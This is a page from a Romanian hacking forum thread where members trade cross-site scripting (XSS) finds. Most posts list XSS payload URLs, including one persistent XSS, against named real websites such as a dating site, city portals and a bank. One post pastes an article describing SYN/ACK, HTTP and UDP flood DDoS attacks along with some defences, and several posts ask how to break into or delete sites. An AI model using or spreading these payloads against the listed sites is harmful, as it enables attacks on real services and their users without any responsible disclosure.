Filehost.ro - gazduire fisiere
Hacking and more...
HaCkinG CulT
Nou pe simpatie:
cristina25 Profile
Femeie
24 ani
Cluj
cauta Barbat
24 - 58 ani
Hacking and more...ReguliInregistrareLoginPozeNu sunteti logat. Lista Forumurilor Pe Tematici
Hacking and more... / Hacked /

XSS-uri gasite de voi

Pagini:  1 2 3 Moderat de Shocker
#26
flo_flow
Vizitator



http://packetstormsecurity.org/0705-exp ... eb-xss.txt
Fac un exploit cat de curand.


 
   
#27
tw8
Elite Member
Din: Drobeta Turnu Severin
Postari: 1087
Nice, dar trebuia pus tot la XSS-uri
Fulltorrent:-).
e-referate.ro :-).
Si aici 1
Mai puneti ma si voi sa mai umplem topicul, ca ma enervati si pun tot ce gasesc la XSS (la asta am fost dur rau :-)) )
BRD :P


_______________________________________



 
   
#28
tw8
Elite Member
Din: Drobeta Turnu Severin
Postari: 1087
Cabanova.ro :-)
Aici


_______________________________________



 
   
#29
OldNavy
Elite Member
Din: Toplita
Postari: 555
nice tw8,vad ca aproape toate site-urile sunt vulnerabile la XSS,in search form

_______________________________________
to see a world in a grain of sand, and heaven in a wild flower, to hold infinity in the palm of your hand and eternity in an hour.

 
   
#30
Nemessis
Senior
Postari: 129
La voi nu se acorda credit pentru cine descopera xss? Ca vad cele doua gasite de mine si postate pe forumuri publice (brd si cabanova) postate aici fara sa se acorde credit :)

_______________________________________
Hackerul de romania (descriere) - http://rstzone.org/forum/viewtopic.php?p=41870#41870

 
   
#31
tw8
Elite Member
Din: Drobeta Turnu Severin
Postari: 1087

Nemessis a scris:

La voi nu se acorda credit pentru cine descopera xss? Ca vad cele doua gasite de mine si postate pe forumuri publice (brd si cabanova) postate aici fara sa se acorde credit

Nu am stiut ca le-ai gasit si tu :P.


_______________________________________



 
   
#32
Nemessis
Senior
Postari: 129
a ok shit happends

_______________________________________
Hackerul de romania (descriere) - http://rstzone.org/forum/viewtopic.php?p=41870#41870

 
   
#33
tw8
Elite Member
Din: Drobeta Turnu Severin
Postari: 1087
Link.
Alt Link
@NemessisL Te rog sa postezi si aici XSS-urile pe care le gasesti, ca sa nu le pun eu si dupaia sa apara probleme


_______________________________________



 
   
#34
Johnny
Little Kevin
Postari: 49
Fbi...
http://img518.imageshack.us/my.php?image=fbistn1.jpg


 
   
#35
carter22
Pe lista neagra
Postari: 11
ecko-kill

        Sal all
imi spuneti si mie cum pot sa sparg un site?????????????????
tot caut pe forum asa ceva, dar nu inteleg nimic
   

In articolul ce urmeaza va voi spune mai multe despre Ddos pentru a intelege ce este si cum lucreaza…Pentru inceput va pot spune ca atacurile Ddos sunt foarte puternice si grave! Scopul acestor atacuri este de a incarca serverul web cu cit mai multe adresari si comenzi, ca acesta in rezultat sa lucreze cu mult mai greu sau chiar in genere sa se opreasca! Astazi sunt mai multe tipuri de atacuri Ddos si in continuare voi incerca sa spun cite ceva despre fiecare dintre ele! Cum sa afli daca te ataca prin ddos si prin ce metoda? Nu este chiar asa de greu! Cred ca este de ajuns sa inspectezi serverul. Daca acesta a inceput sa lucreze mai greu, este posibil sa fiti atacati, si anume: daca sau marit de citeva ori logurile apache-ului, inseamna ca este un http flood. Daca v-ati intilnit cu problema conectarii la servicii (spre exemplu ftp) din cauza ca numarul maximal de conexiuni a fost atins, atunci este un Syn/Ack flood. La aparitia atacului de tip ping flood, practice nu veti simti diferenta dintre traficul intrare/iesire. Iar acum va voi spune putin mai amanuntit despre fiecare dintre aceste tipuri de atacuri…

$$ SYNACK Flood $$

Scopul principal a acestui tip de ddos este de a incarca porurile adica de a incerca cit mai multe conexiuni la porturile vitale a serverului. Un minus mare a acestui tip de atac este faptul ca cea mai mare parte a botilor ataca toate porturile… Cu acest Syn/Ack flood este cel mai bine de atacat acele porturi, unde se controleaza numarul conexiunilor! Spre exemplu: daca in optiunile demonului SSH este indicat numarul maxim de conexiuni – 20 conecxiuni in acelasi timp, este foarte simplu! In unele cazuri, chiar si o singura masina poate sa aduca acest demon in stare Dos. La general, prin acest tip de atac ataci porturile vitale a serverului si unde se duce evidenta conexiunilor maxime ce au loc in acelasi timp! Pentru a te apara de aceste atacuri, este important sa ai un firewall pe server. Adica este necesar ca adresele ip a acestori boti ce ataca sa fie aruncati in black list sis a fie interzise pe server…
 

$$ HTTP Flood $$

Urmatorul tip de atac este Http Ddos. Este capabila sa lucreze pe siteurile unde se lucreaza cu bazele de date. Daca siteul atacat lucreaza cu baze de date, tinta atacului sunt scripturile ce lucreaza ca acestea. Sun termenul ataca se are in vedere trimiterea comenzior Get si marirea adresarilor catre baza de date in acelasi interval de timp. Apararea serverului de acest tip de atac consta in banarea adreselor ip dupa criteriul User_Agent deoarece botii de atac folosesc pe acestea. O alta varianta este sa schimbati numele scriptului sau sa creati subdomenii si sa mutati acolo siteul. Sau mai merge si asta: creati o alta pagina in loc de principala, iar pe aceasta sa scriti ceva de genul: Apasati aici ca sa accesati siteul…Se face cu scopul de a scapa de boti deoarece acestia nu au ratiune si veti putea scapa de o mare parte dintre ei…Astfel, veti fi in stare sa vedeti si sa diferentiati userii de boti cu o precizitate de 90%! Si nu uitati de banarea adreselor ip! Acum cind veti putea diferentia botii de useri, va va fi mai usor sa blocati anume acele adrese ce nu sunt dorite!

$$ UDP flood $$

Este un simplu flood! Atacul are loc prin intermediul unei simple trimiteri de pachet la un oarecare port UDP a serverului. Cind acesta ajunge la server, sistema incepe sa lucreze activ cu acesta.  Lucreaza pina cind trimete la rindul sau un pachet rau din cauza ca pachetele UDP trimise de noi sunt rele. Odata ce se incepe flooding la porturile UDP, sistema cade la pamint! Pentru a rezista in fata acestora, este necesar de pus brandmovere in asa locuri vulnerabile…Deasemenea trebuie de stins asa servicii ca echo si chargen. Este necesar sa filtrati si alte servicii folosite de UDP si nu in ultimul rind, sa stingeti toate blocurile ce sunt folosite de UDP, inafara de cele vitale!


 
   
#36
maleficus
Elite Member
Din: 0111 1000
Postari: 515
wtf/?  out n00b

_______________________________________
Viata e un joc de c***t ... dar macar are grafica buna!!!
onlain gheims...

 
   
#37
OldNavy
Elite Member
Din: Toplita
Postari: 555
carter22,ai baut ceva?numa la flood va sta mintea

_______________________________________
to see a world in a grain of sand, and heaven in a wild flower, to hold infinity in the palm of your hand and eternity in an hour.

 
   
#38
tw8
Elite Member
Din: Drobeta Turnu Severin
Postari: 1087
Tot in search form

_______________________________________



 
   
#39
diabolo
Membru nou
Postari: 14
OSHO , te rog mult, prin ceea ce iai zis Ecko-Kill, ca nu poate sparge un site. iai zis ca trebuie sa invete sa faca un site sa citeasca...te rog mult ca sa nu raman un : citez: "lammer" ajutama si pe mine , indruma-ma , dami niste sfaturi, niste indrumari. Imi Cer Scuze De Drj...

_______________________________________
" apara-ma Doamne de Prieteni, Ca de Dusmani Ma Apar Singur . "

 
   
#40
diabolo
Membru nou
Postari: 14
OSHO , te rog mult, prin ceea ce iai zis Ecko-Kill, ca nu poate sparge un site. iai zis ca trebuie sa invete sa faca un site sa citeasca...te rog mult ca sa nu raman un : citez: "lammer" ajutama si pe mine , indruma-ma , dami niste sfaturi, niste indrumari. Imi Cer Scuze De Drj...

_______________________________________
" apara-ma Doamne de Prieteni, Ca de Dusmani Ma Apar Singur . "

 
   
#41
diabolo
Membru nou
Postari: 14
OSHO , te rog mult, prin ceea ce iai zis Ecko-Kill, ca nu poate sparge un site. iai zis ca trebuie sa invete sa faca un site sa citeasca...te rog mult ca sa nu raman un : citez: "lammer" ajutama si pe mine , indruma-ma , dami niste sfaturi, niste indrumari. Imi Cer Scuze De Drj...

_______________________________________
" apara-ma Doamne de Prieteni, Ca de Dusmani Ma Apar Singur . "

 
   
#42
diabolo
Membru nou
Postari: 14
vaiiiiiiiiiiiiiiiiiiiiiii Imi Cer Scuze de postarea asta...:-SS....Imi Pare Rau Nu A Fost Cu Intentie...Imi Pare Rau Inca 1 Data....

_______________________________________
" apara-ma Doamne de Prieteni, Ca de Dusmani Ma Apar Singur . "

 
   
#43
icelord
Elite Member
Postari: 612
vai mama lui de 3xforum cenzurat!

_______________________________________

MuOnline&Counter-Strike Support

 
   
#44
Johnny
Little Kevin
Postari: 49
http://www.gritechnologies.com/tools/di ... t>alert('Johnny')</script>

http://xuqa.com/login.php?dest="&g ... t>alert('Johnny')</script>

http://www.sfgay.org/app/login.php?dest ... t>alert('Johnny')</script>

http://www.global-fitness.com/login.php ... t>alert('Johnny')</script>

http://www.urgo.es/login.php?dest=" ... t>alert('Johnny')</script>

http://www.minneapolis.com/app/login.ph ... t>alert('Johnny')</script>

http://www.stpetersburg.com/app/login.p ... t>alert('Johnny')</script>

http://www.saltlakecity.com/app/login.p ... t>alert('Johnny')</script>


 
   
#45
andrewboy
Grand Master
Postari: 330
lol ...orikum cam 90% din site-uri ce contine o metoda de cautare au xss

_______________________________________
http://andrewboy2007.ifastnet.com/home/  ---ziceti-mi parerea voastra despre chat

 
   
#46
escalation666
Little Kevin
Din: Valhalla
Postari: 53
www.simpatie.ro
panarama de site care promoveaza bitching-ul.

http://simpatie.ro/index.php?page=hot_l ... T>alert(String.fromCharCode(88,83,83))</SCRIPT>
http://simpatie.ro/index.php?page=view_ ... T>alert(String.fromCharCode(88,83,83))</SCRIPT>

XSS permanent:
trebuie sa ai cel putin 2 persoane la favorites ca sa functioneze.
http://simpatie.ro/index.php?page=favou ... t>alert(String.fromCharCode(88,83,83))</script>&action=delete&fav_id=idul_persoanei


 
   
#47
Nemessis
Senior
Postari: 129
O greseala care poate aduce multe probleme: http://rsb-team.com/upload/fisiere/nemessis.htm

_______________________________________
Hackerul de romania (descriere) - http://rstzone.org/forum/viewtopic.php?p=41870#41870

 
   
#48
turnatoru
Membru nou
Postari: 5
http://stores.yokel.com/merchantcenter/ ... d+my+store

 
   
#49
byjunior
Elite Member
Din: Your PC
Postari: 651

Nemessis a scris:

O greseala care poate aduce multe probleme: http://rsb-team.com/upload/fisiere/nemessis.htm

my mistake


_______________________________________

Tv online

 
   
#50
Sworte
Junior+
Postari: 44
Can anyone teach me how can I delete a site?


























Thank you.


 
   
Pagini:  1 2 3  
Mergi la